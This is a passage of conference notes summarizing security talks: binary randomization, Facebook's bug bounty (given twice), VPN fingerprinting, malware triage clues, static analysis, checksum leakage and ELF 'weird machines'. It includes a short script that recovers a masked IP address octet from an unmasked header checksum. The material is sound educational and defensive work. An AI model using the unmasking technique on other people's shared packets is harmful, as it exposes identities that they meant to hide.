Instruction Relocation). STIR disassembles binary and operates on "basic blocks" of code. The STIR disassembler is conservative in what to disassemble. Each basic block is moved to a random location in memory. Next, STIR writes new code sections with copies of "basic blocks" of code in randomized locations. The old code is copied and rewritten with jumps to new code. the original code sections in the file is marked non-executible. STIR has better entropy than ASLR in location of code. Makes brute force attacks much harder. STIR runs on MS Windows (PEM) and Linux (ELF). It eliminated 99.96% or more "gadgets" (i.e., moved the address). Overhead usually 5-10% on MS Windows, about 1.5-4% on Linux (but some code actually runs faster!). The unique thing about STIR is it requires no source access and the modified binary fully works! Current work is to rewrite code to enforce security policies. For example, don't create a *.{exe,msi,bat} file. Or don't connect to the network after reading from the disk. Clowntown Express: interesting bugs and running a bug bounty program Collin Greene Collin Greene, Facebook Collin talked about Facebook's bug bounty program. Background at FB: FB has good security frameworks, such as security teams, external audits, and cc'ing on diffs. But there's lots of "deep, dark, forgotten" parts of legacy FB code. Collin gave several examples of bountied bugs. Some bounty submissions were on software purchased from a third-party (but bounty claimers don't know and don't care). We use security questions, as does everyone else, but they are basically insecure (often easily discoverable). Collin didn't expect many bugs from the bounty program, but they ended getting 20+ good bugs in first 24 hours and good submissions continue to come in. Bug bounties bring people in with different perspectives, and are paid only for success. Bug bounty is a better use of a fixed amount of time and money versus just code review or static code analysis. The Bounty program started July 2011 and paid out $1.5 million to date. 
Clowntown Express: interesting bugs and running a bug bounty program
Collin Greene, Facebook

Collin talked about Facebook's bug bounty program.
- Background: FB has good security practices, such as security teams, external audits, and cc'ing security on diffs. But there are lots of "deep, dark, forgotten" parts of legacy FB code.
- Collin gave several examples of bountied bugs. Some bounty submissions were against software purchased from a third party (but bounty claimers don't know and don't care).
- FB uses security questions, as does everyone else, but they are basically insecure (often easily discoverable).
- Collin didn't expect many bugs from the bounty program, but they ended up getting 20+ good bugs in the first 24 hours, and good submissions continue to come in.
- Bug bounties bring in people with different perspectives, and are paid only for success. A bug bounty is a better use of a fixed amount of time and money than code review or static code analysis alone.
- The bounty program started in July 2011 and has paid out $1.5 million to date. 14% of the submissions have been high-priority problems that needed to be fixed immediately.
- The best bugs come from a small percentage of submitters (as with everything else); the top-paid submitters earn six figures a year. Spammers like to backstab competitors. The youngest submitter was 13. Some submitters have been hired.
- Bug bounties also surface bugs that were missed by tools or reviews, allowing the process to improve. Bug bounties might not work for traditional software companies whose product has a release cycle or is not on the Internet.

Active Fingerprinting of Encrypted VPNs
Anna Shubina, Dartmouth Institute for Security, Technology, and Society

(I missed the start of her talk because another track went overtime, but I have the DVD of the talk, so I'll expand on this later.)
- IPsec leaves fingerprints. Using netcat, one can easily visually distinguish various crypto chaining modes just from packet timing on a chart (for example, DES-CBC versus AES-CBC).
- One can tell a lot about a VPN just from ping round trips (such as what router is used).
- Delayed packets are not informative about a network, especially from far away.
- More exploration is needed of how TCP behaves in real life with respect to timing.

Making Attacks Go Backwards
FuzzyNop, Mandiant

This talk is not about threat attribution (finding who), product solutions, politics, or sales pitches.
- Who is making these malware threats? It's not a single person or group; the authors have diverse skill levels, and there are a lot of fat-fingered fumblers out there.
- Always look for low-hanging fruit first: "hiding" malware in the temp, recycle, or root directories; creation of unnamed scheduled tasks; obvious names of files and syscalls ("ClearEventLog"); uncleared event logs. Clearing the event log in itself, and the time of clearing, is a red flag and a good first clue to look for on a suspect system.
- Reverse engineering is hard. Disassembler use takes practice and skill. A popular tool is IDA Pro, but it takes multiple interactive iterations to get a clean disassembly.
- Keyloggers are used a lot in targeted attacks. They are typically custom code or built into a backdoor. A big tip-off is that non-printable characters need to be printed out (such as "[Ctrl]" or "[RightShift]"), as do timestamp printf strings. Look for these in files. Presence is not proof they are used; absence is not proof they are not used.
- Java exploits: one can parse the jar file with idxparser.py and decompile the Java. Java is typically used to target tech companies.
- Backdoors are the main persistence mechanism (provided externally) for malware. Malware also typically needs command and control.

Application of Artificial Intelligence in Ad-Hoc Static Code Analysis
John Ashaman, Security Innovation

Initially John tried to analyze open source files with open source static analysis tools, but these showed thousands of false positives. He also tried grep, but that fails to find anything even mildly complex. So John decided to write his own tool.
- His approach was to first generate a call graph, then analyze the graph. The problem is that making a call graph is really hard; one obstacle is "evil" coding techniques, such as passing function pointers.
- First the tool generates an Abstract Syntax Tree (AST), with nodes created from method declarations and edges created from method use. Then the tool generates a control-flow graph, with the goal of finding a path through the AST (a maze) from source to sink. The algorithm looks at adjacent nodes to see if any are "scary" (a vulnerability), using heuristics for the search order. (A minimal sketch of this source-to-sink search follows.)
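Scat itself targets C#, and the talk notes don't include its code. As a minimal sketch of the source-to-sink step, assuming a hand-written toy call graph with invented function names:

```python
#!/usr/bin/env python3
"""Minimal source-to-sink search sketch over a call graph.

This is not Scat (which targets C#); the graph, source, and sink names
here are made up to illustrate the find-a-path-through-the-maze step.
"""
from collections import deque

# Toy call graph: edges mean "caller invokes callee".
CALL_GRAPH = {
    "handle_request": ["parse_params", "render"],
    "parse_params": ["unescape", "build_query"],
    "build_query": ["run_sql"],   # run_sql is the "scary" sink here
    "render": ["escape_html"],
    "unescape": [],
    "escape_html": [],
    "run_sql": [],
}

def find_path(graph, source, sink):
    """BFS from source to sink; returns one call chain or None."""
    queue = deque([[source]])
    seen = {source}
    while queue:
        path = queue.popleft()
        if path[-1] == sink:
            return path
        for callee in graph.get(path[-1], []):
            if callee not in seen:
                seen.add(callee)
                queue.append(path + [callee])
    return None

if __name__ == "__main__":
    chain = find_path(CALL_GRAPH, "handle_request", "run_sql")
    print(" -> ".join(chain) if chain else "no path")
```

A real tool would replace the hand-written graph with one extracted from source, and replace plain BFS with the "scary-node-first" heuristic ordering the notes describe.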
- The tool, called "Scat" (Static Code Analysis Tool), currently looks for C# vulnerabilities and some simple PHP. Later, he plans to add more PHP, then JSP and Java. For more information, see his posts on the Security Innovation blog, and NRefactory on GitHub.

Mask Your Checksums—The Gorry Details
Eric (XlogicX) Davisson

- Sometimes, when emailing or posting TCP/IP packets to analyze a problem, you may want to mask the IP address. But to do this correctly you need to mask the checksum too, or you'll leak information about the IP. Problem reports found on stackoverflow.com, sans.org, and pastebin.org are usually not masked, but a few companies do care.
- If only the IP is masked, the IP may be guessed from the checksum (that is, the checksum leaks data), and other parts of the packet may leak more data about the IP. The TCP checksum (via its pseudo-header) and the IP header checksum both cover the IP addresses, so using both checksums yields more bits of information than using one alone. Also, one can usually determine the OS from the TTL field and the ports in a packet header.
- If you get hundreds of possible results (16 for each masked nibble that is unknown), you can narrow them further, such as by looking at the packet contents for domain or geo information. With hundreds of results, you can import them as CSV into a spreadsheet and correlate with geo data to see where each possibility is located.
- Eric then demoed a real email report with a masked IP packet attached, and was able to recover the exact IP address given the geo data and university of the sender.
- The point: if you're going to mask a packet, do it right. Eric wouldn't usually bother, but do it correctly if at all, so as not to create a false impression of security. (A sketch of the checksum arithmetic behind the guessing follows.)
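The tooling from the talk isn't shown in these notes, but the arithmetic behind the guessing attack is just the standard IPv4 header checksum. A self-contained sketch with made-up header bytes, recovering a "masked" source octet from an unmasked checksum:

```python
#!/usr/bin/env python3
"""Sketch of recovering a masked IP octet from an unmasked header checksum.

The header bytes below are made up. We pretend the last octet of the
source address was zeroed by whoever "masked" the packet, but the
original IPv4 header checksum was left intact, and recover the octet.
"""
import struct

def ip_checksum(header: bytes) -> int:
    """Standard IPv4 header checksum: one's-complement sum of 16-bit words."""
    total = sum(struct.unpack(f"!{len(header)//2}H", header))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

# A minimal 20-byte IPv4 header: 192.168.1.42 -> 10.0.0.5
header = bytearray(
    bytes.fromhex("45000054abcd40004001")   # ver/ihl ... ttl=64, proto=ICMP
    + bytes(2)                              # checksum field (zeroed to compute)
    + bytes([192, 168, 1, 42])              # source IP
    + bytes([10, 0, 0, 5])                  # destination IP
)
original_sum = ip_checksum(bytes(header))   # what the real packet would carry

header[15] = 0  # "mask" the last octet of the source address
candidates = [b for b in range(256)
              if ip_checksum(bytes(header[:15]) + bytes([b]) + bytes(header[16:]))
              == original_sum]
print("candidates for masked octet:", candidates)  # expect [42]
```

With more masked nibbles the candidate set grows (16 per unknown nibble, as in the talk), which is where the TCP checksum and geo correlation come in to narrow it back down.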
Adventures with weird machines thirty years after "Reflections on Trusting Trust"
Sergey Bratus, Dartmouth College (with Julian Bangert and Rebecca Shapiro, not present)

- "Reflections on Trusting Trust" is Ken Thompson's classic 1984 paper: "You can't trust code that you did not totally create yourself." There are invisible links in the chain of trust, such as "well-installed microcode bugs", the compiler, and other planted bugs. Thompson showed how a compiler can introduce and propagate bugs in unmodified source.
- But suppose there are no bugs and you trust the author: can you trust the code? Hell no! There are too many factors; it's Babylonian in nature. Why not?
  - Input is not well defined or recognized: the code's assumptions about "checked" input will be violated (a bug/vulnerability). For example, HTML is recursive, but regex checking is not.
  - Input can be well formed yet so complex there's no telling what it does. For example, ELF file parsing is complex, and there are multiple ways of parsing it.
  - Input is seen differently by different pieces of a program or toolchain.
- Any input is a program: input "executes" on its input handlers, driving state changes and transitions. Only a well-defined execution model can be trusted (regex/DFA, PDA, CFG). An input handler is either a "recognizer" for the input as a well-defined language (see langsec.org) or a "virtual machine" for inputs to drive into pwn-age. (A minimal recognizer sketch closes these notes.)
- Case study: the ELF ABI (the UNIX/Linux executable file format). Problems can arise from any of these steps, without planting bugs: compiler, linker, loader, ld.so/rtld, relocator, DWARF (debugger info), and exceptions.
- The problem is that you can't really automatically analyze code (it's the halting problem, which is undecidable). The only solution is to freeze code and sign it. But you can't freeze everything! You can't freeze ASLR or loading; you must have tables and metadata.
- Any sufficiently complex input data is the same as VM byte code. For example, ELF relocation entries + dynamic symbols == a Turing machine. @bxsays created a Turing machine in Linux from relocation data (not code) in an ELF file; for more information, see Rebecca "bx" Shapiro's presentation from last year's Toorcon, "Programming Weird Machines with ELF Metadata". @bxsays did the same thing with Mach-O bytecode.
- DWARF exception-handling data works too: .eh_frame + glibc == a Turing machine.
- The x86 MMU (IDT, GDT, TSS): address translation was used to create a Turing machine. The page-fault handler reads and writes memory, using a page table that serves as the Turing machine's byte code. There is an example on GitHub using this TM to fly a glider across the screen.
- Next Sergey talked about "parser differentials": one input format with two parsers creates confusion and opportunity for exploitation. For example, CSRs are parsed during creation by the cert requestor and again by another parser at the CA. Another example is ELF: there are several parsers in the OS toolchain, and they are all different. A binary can have two different Program Headers (PHDRs) because ld.so parses multiple PHDRs; the second PHDR can completely transform the executable. This is described in a paper in the first issue of the International Journal of PoC.

Conclusions:
- Trusting computers is not only about bugs! Bugs are part of the problem, but by no means all of it.
- Complex data formats mean bugs.
- There is no "chain of trust" in Babylon (that is, with parser differentials).
- We need to squeeze complexity out of data until data stops being "code equivalent".

Further information: see langsec.org, and the USENIX WOOT 2013 (Workshop on Offensive Technologies) proceedings for "weird machines" papers and videos.
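To make the recognizer point concrete, here is a minimal langsec-style sketch, assuming an invented input language (comma-separated unsigned decimal integers). The handler is an explicit DFA that accepts or rejects the whole input before anything else consumes it:

```python
#!/usr/bin/env python3
"""Minimal langsec-style recognizer sketch.

The input "language" here is made up (comma-separated unsigned decimal
integers). The handler is an explicit DFA: it accepts or rejects before
any other code acts on the input, rather than letting malformed input
drive the program into unintended states.
"""

# States of the DFA.
START, IN_NUMBER, AFTER_COMMA = range(3)

def recognize(data: str) -> bool:
    """Accept iff data matches: digit+ (',' digit+)*"""
    state = START
    for ch in data:
        if ch.isascii() and ch.isdigit():
            state = IN_NUMBER
        elif ch == "," and state == IN_NUMBER:
            state = AFTER_COMMA
        else:
            return False          # reject on the first unexpected character
    return state == IN_NUMBER     # must end inside a number

if __name__ == "__main__":
    for sample in ["1,22,333", "1,,2", "", "12,"]:
        print(repr(sample), recognize(sample))
```

The contrast with the "virtual machine" failure mode is that this handler's state space is tiny and fully enumerated, so there is nothing for crafted input to drive it into.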
